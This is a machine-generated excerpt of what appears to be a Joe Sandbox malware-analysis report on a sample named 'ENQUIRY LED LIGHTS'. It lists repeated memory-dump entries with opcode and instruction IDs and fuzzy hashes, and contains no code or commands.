                                                                                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                  • Instruction Fuzzy Hash: E501C032A00108AFEB21DB54CC00B5A77AAEF417D4F058526EB159B260E772DD40CB92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                  • Instruction ID: 3a483c1ff47ec7adff816606d658b21a538c11c71b3ab759a7fdf4f802baec0c
                                                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                  • Instruction Fuzzy Hash: B601D272905B159BCB308F15D880A767BA5EF49BE07508A3DFF958B6C0D731D800EBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 600f638aacca0ae1ade96da30b6eeb28acc1229229013b8c48b371c5333c4312
                                                                                                  • Instruction ID: c076b6f662c6e58d06984933f2050a1a657bace82a6c3c7e3563d5c7054499e2
                                                                                                  • Opcode Fuzzy Hash: 600f638aacca0ae1ade96da30b6eeb28acc1229229013b8c48b371c5333c4312
                                                                                                  • Instruction Fuzzy Hash: AB117071941628ABDF25EF64CC41FE9B3BAAF04750F5041D5AB14E60E0DB709E81CF84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fa82805732b7ee9f465f4e2c1536b5c92988fc423d95d5a70d5bc874f0c40d18
                                                                                                  • Instruction ID: 30138c427a48765313756f227520420484619d38478a329f6004948ffcc9b4c5
                                                                                                  • Opcode Fuzzy Hash: fa82805732b7ee9f465f4e2c1536b5c92988fc423d95d5a70d5bc874f0c40d18
                                                                                                  • Instruction Fuzzy Hash: EC117932641240EFCB16AF18CD90F16BBB9FF48B98F2000A5FA059B6A1C335E901CA90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                  • Instruction ID: d29d2b92864d1c5c9a91ea4f8423d4e1c5b02c7145655109edcfb52f8ffc6a81
                                                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                  • Instruction Fuzzy Hash: CA01D833A001208BDF159A59DC84B627766FFC4B90F9546A5EF068F249DB71D881C790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 680da11290251dcb1ca0007541a6d685640f4ab1a507c092ff577de40706342b
                                                                                                  • Instruction ID: fd5c80aa04cb739cb499b076e7d8c0c6b0d078c4c23bb26e6f106f2779733d3c
                                                                                                  • Opcode Fuzzy Hash: 680da11290251dcb1ca0007541a6d685640f4ab1a507c092ff577de40706342b
                                                                                                  • Instruction Fuzzy Hash: 08111B73900019ABCF15DB94CC84DDF7B7DEF48358F044166AA06E7210EA34AA54CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6efe3fe70b202e213131229abc77a0ccb58476c3392261f5c2dc0e6e7359f3cd
                                                                                                  • Instruction ID: b4690460fc7cb3a42303713d2942c2092008e0c83d1f46e278f60907cf75ac0d
                                                                                                  • Opcode Fuzzy Hash: 6efe3fe70b202e213131229abc77a0ccb58476c3392261f5c2dc0e6e7359f3cd
                                                                                                  • Instruction Fuzzy Hash: 8D1104B26041459FCB00CF58C810BA2B7BAFF4A344F0C8159EA48CB315D732EC80CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf64f2b2e2dfa707301b0314c4a6c02732f12a961507ae2108f891604a441404
                                                                                                  • Instruction ID: 1dadf657837e6a46c4f16eded3ff47fa888ac08b1e3d63b7b642073ffd9d8ada
                                                                                                  • Opcode Fuzzy Hash: bf64f2b2e2dfa707301b0314c4a6c02732f12a961507ae2108f891604a441404
                                                                                                  • Instruction Fuzzy Hash: BB01B5359411209BC733AB12C850AEAB7AEFF437D0B84846EE7445B650C7309C41CF91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 32253d4cec1fe08f42316ebbc15d01e7c24ce05556f6c67ad546e8167a831923
                                                                                                  • Instruction ID: 5447da8a86713d5dfe6a61d80de9d94048b54dd4cfeb51465295aafaef8d1fe9
                                                                                                  • Opcode Fuzzy Hash: 32253d4cec1fe08f42316ebbc15d01e7c24ce05556f6c67ad546e8167a831923
                                                                                                  • Instruction Fuzzy Hash: 2A11E8B1E002199BCB04DFA9D545AAEB7F9EF48340F50406ABA05E7351D674EA01CBA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d4d7a1daf9d1a6d2eb20b9ff94f7e1d6fb5c6fefa6429a944a12d1d1b6e1958f
                                                                                                  • Instruction ID: 91a83dc46582884ebd039f1199e1867016be9807c82cab1dcbca582dcc5f750b
                                                                                                  • Opcode Fuzzy Hash: d4d7a1daf9d1a6d2eb20b9ff94f7e1d6fb5c6fefa6429a944a12d1d1b6e1958f
                                                                                                  • Instruction Fuzzy Hash: 4A01DF71681A10AFD3329B16D840B86BAE9DF45B94F00442AA70A9F390D7B098408F84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 841879e67ee13797790079853e86b09d57b3fb69fcc3df3c829524a01ecc73e5
                                                                                                  • Instruction ID: 348cdbb6eff76b97a58d5dd2a9d341f958de0d538ac94a9f0d33a46ce74ac2a5
                                                                                                  • Opcode Fuzzy Hash: 841879e67ee13797790079853e86b09d57b3fb69fcc3df3c829524a01ecc73e5
                                                                                                  • Instruction Fuzzy Hash: E1F0F933B41A24B7C7319B968D90F177AAEDB84BD0F104028BB0697640DA30ED01CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                  • Instruction ID: f6f2b77a06c8aa1debeb3db2a579335fbc90375481b4107d266a1464df3d9e2c
                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                  • Instruction Fuzzy Hash: 16F0FC736546329BCB3216594CC0B2BF5968FC5BE4F190237E3059B2C4CA64CC01B7D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                  • Instruction ID: 8c5cbe9c413a603073ec5574fe2988ff4e0b138958f5923e1c15e759ff8955a5
                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                  • Instruction Fuzzy Hash: 61F0C2F2A00A20ABD329CF4DDC40E67F7EADFC0B80F048129A605DB220EA31DD04CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                  • Instruction ID: 80c221079dd7f94a2241cd64fe84594fb401ccbdd792849c2a9b6c93b9227305
                                                                                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                  • Instruction Fuzzy Hash: 7301D1336016889BD322A619CD09B59BF99EF417D4F4844A2FB05CB6A1DBB8C800C610
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                  • Instruction ID: 34a0e62df658c74c648de17393b6308a4ada2b73bffdf7cc763da6be3cdfcf4d
                                                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                  • Instruction Fuzzy Hash: AFF06D7220001DBFEF029F94DD80DAF7BBEEB493E8B104124FA00A6060D235DD21ABA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c670c86b2eddb2910725b190ab1c7238d427ed5ed3b1b77f5b21b2d3ea627dca
                                                                                                  • Instruction ID: 53007c83a86df6b4ff9d91b9c5b5f6df65ed4bbe245259aabe88c7d3c7d636bd
                                                                                                  • Opcode Fuzzy Hash: c670c86b2eddb2910725b190ab1c7238d427ed5ed3b1b77f5b21b2d3ea627dca
                                                                                                  • Instruction Fuzzy Hash: 2C014F71E0125D9BCF04DFA9D845AEEB7B8EF58754F14409AFA01E7280D774EA01CBA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                  • Instruction ID: 0d80981124c7bb3c33bf4e3242ebbea340377a0c66ba1b59f610242c6ba0e982
                                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                  • Instruction Fuzzy Hash: 87E08C32640A30EEDB312E21DC40B5177A2FB48BE0F105929E7811A0A48774AC81EF44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 75b4af6dfb8fd808fc2d324fc295c162faede8a2606b077c41c84525149e9997
                                                                                                  • Instruction ID: 5e8ec7b009c396173b23795542b3898c74f8896bb79501de50b60fcf36ad7c75
                                                                                                  • Opcode Fuzzy Hash: 75b4af6dfb8fd808fc2d324fc295c162faede8a2606b077c41c84525149e9997
                                                                                                  • Instruction Fuzzy Hash: DEE08C321004646BC211FB9DED10F4A779BEB953A0F400125B2508B2D4CA24AC40CB94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction ID: 968072fda0942c425ef21a94a9df60c1c4e6a46daf975eed0a1cce95290ff373
                                                                                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                  • Instruction Fuzzy Hash: 3BE08633511A1497C728DE18D911B7277A4EF45760F09463EA61347780CA74E544C794
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                  • Instruction ID: d7303127283ec67b40a5f841ca01cca3461a175fd33a5df1fc704ac083bc8004
                                                                                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                  • Instruction Fuzzy Hash: 38D05E36511A50AFC3329F1BEE04C13BBF9FBC9B60705066EA54583920C775A846CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                  • Instruction ID: 00ed1ac8d2f99994cb6f27dac5f64114c091a5684380f7b3218440b8dca59f8b
                                                                                                  • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                  • Instruction Fuzzy Hash: 6DD05BA510C2C687D711491981617B57F1D47C2DD4F38507ED6558FA02DA17D443D52F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                  • Instruction ID: 0ea72fec8f9cd39663d213ce9dba9a1b8d8a5a6ea709070f87ce59873d02cef6
                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                  • Instruction Fuzzy Hash: 1ED0C972654660ABD772AA1CFC04FD373E9AB887A1F160499B119CB150C7A5AC81CA84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                  • Instruction ID: 2a7ddb1b9eae074d68552b6dc2775450eb1e8870d4b150dbd7627981b6f80e3b
                                                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                  • Instruction Fuzzy Hash: 50E08C31D406809BCF12EF58CA40F4AB7F6BB84B80F140048A1085B220C324A800CB40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                  • Instruction ID: 8ec86906e86354347532c742db589f7acaa90e5473fac9d9138f6b527b4fa5e8
                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                  • Instruction Fuzzy Hash: DFD02233316030A3CB285A606C40F6379069B85BE4F0A006C370A93840C1088C82EAE0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d10d895350946ba4ed179d843c3cb684a70490192ea51cd785cf79858b519fc6
                                                                                                  • Instruction ID: f6d325044ccd1ee8d51cc68323ad62853ee83b10283a65b3583f9d7a91fb2806
                                                                                                  • Opcode Fuzzy Hash: d10d895350946ba4ed179d843c3cb684a70490192ea51cd785cf79858b519fc6
                                                                                                  • Instruction Fuzzy Hash: 95D0A735A42005CBCF16EF04CA20E2E7AB1EF046C4F8010A9E70051030D729DC01CA00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                  • Instruction ID: affbe9ee85cdbb4e348d5b0de882b17e9009454f514df9bff8329e718294b033
                                                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                  • Instruction Fuzzy Hash: 73D012771D055CBBCB119F65DC01F957BA9E755BA0F445020B6048B5A0C63AE990DA84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                  • Instruction ID: e51975fc6af1be568a1944cc8b01571c962a1a2b70ef5400b04e8020920be9a5
                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                  • Instruction Fuzzy Hash: B2D0C936712E80CFC71BCB0CC5A4B2533B4FB45B84F8104A5E501CBB61DB2CD944CA00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                  • Instruction ID: 3ffc92e1308c6a0de418931cad00de473e5120114362846f6fb6fc1edbbc6807
                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                  • Instruction Fuzzy Hash: 8DC01232290648AFC712AE98DD01F027BAAEB98B90F000061F3048B670C635E860EA84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction ID: b41c376a0e73ca4f1e3fa67e717566b1226375441635ff5a9db5f908ea288c3b
                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                  • Instruction Fuzzy Hash: 84D01236100248EFCB02DF45C890D9A772BFBC8750F108019FD19076108A31ED62DA50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                  • Instruction ID: c268f5bf43fb1cfb8b5397d7a80b517722dc251778d8bbd9207a0b7181792c28
                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                  • Instruction Fuzzy Hash: B7C04C797015458FCF15DB19D794F5577E5F744780F5508D0E905CB721E724E805CA10
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
                                                                                                  • Instruction ID: 7739b79ab38cc4fc1e3a5dd05478f5afb9520ec1f122ac167a8eee646d66b84f
                                                                                                  • Opcode Fuzzy Hash: a03e51cefe7872d3f5eb921f2fb6ca83339a97116bedd0dc2444cc379da76610
                                                                                                  • Instruction Fuzzy Hash: E8900271605800229140715888885574015D7E0381B55C015E5424554C8A158A5A5361
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
                                                                                                  • Instruction ID: c91c41489c6dbeb143353ce2c2b3e1379c89142a7dc2914d49c0b4b81333011b
